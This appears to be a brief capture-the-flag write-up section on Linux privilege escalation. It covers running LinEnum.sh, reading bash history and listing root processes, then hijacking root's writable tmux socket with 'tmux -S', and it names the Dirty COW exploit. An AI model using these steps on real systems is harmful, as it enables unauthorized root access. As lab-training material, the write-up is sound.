Post Exploitation
Running Linenum.sh
Checking bash history
cat ~/.bash_history
Checking root running processes
ps -ef | grep root
Looking at the TMUX socket file.

We are a member of the hype group, and we have read write access to the file that tmux is using as a socket. (root left it open)
Hopping on to the tmux session
tmux -S /.devs/dev_sess
Dirty cow exploit


Last updated
Was this helpful?